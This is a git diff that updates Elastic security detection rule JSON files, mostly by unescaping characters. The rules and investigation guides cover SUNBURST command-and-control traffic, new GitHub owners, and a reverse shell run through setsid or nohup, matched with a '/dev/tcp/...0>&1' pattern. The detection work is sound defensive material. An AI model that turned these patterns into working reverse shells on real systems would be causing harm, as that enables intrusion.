\"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json index b91974195d4..13287cb0629 100644 --- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUNBURST Command and Control Activity", - "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json index 1475e21548a..0a5358b0e85 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json index 8168b8f3055..57f73b8bb2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json index 8f8caafd4f0..e12ae196c3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json index 624a3b4fbbf..44e186de1c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json index 1a971623b8a..3d731b83199 100644 --- a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json index cac4413ae14..07cab005157 100644 --- a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json index 8e4b0df32c3..de764d6b1f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json index e0b35026f90..f559ce831fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json index 286fd8eaa39..dbe4c97ad6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json index 72ba9fb68d4..70c829b5fa5 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json index 4e05b187f06..015c708f52f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json b/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json index cca05f7f45b..7f9153e4c00 100644 --- a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json index f627104ed37..63795ac8267 100644 --- a/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_2.json b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_2.json new file mode 100644 index 00000000000..3a129c96686 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_2.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a new member is added to a GitHub organization as an owner. This role provides admin level privileges. Any new owner roles should be investigated to determine it's validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings.", + "from": "now-9m", + "index": [ + "logs-github.audit-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "New GitHub Owner Added", + "query": "iam where event.dataset == \"github.audit\" and event.action == \"org.add_member\" and github.permission == \"admin\"\n", + "related_integrations": [ + { + "package": "github", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "github.permission", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "24401eca-ad0b-4ff9-9431-487a8e183af9", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Github" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.003", + "name": "Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1136/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "24401eca-ad0b-4ff9-9431-487a8e183af9_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json index c9d1adfe300..3966fd70e30 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json index 79f3eea5787..7128f637320 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json index 5ab79a57a5b..4a67a8871f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json index a355c47b9c5..82c0f824de8 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json index e2bc85a8312..1066919a604 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json index 25d2c248c85..c1d16f9120e 100644 --- a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Background Process", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0\u003e\u00261*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "related_integrations": [ { "package": "endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json 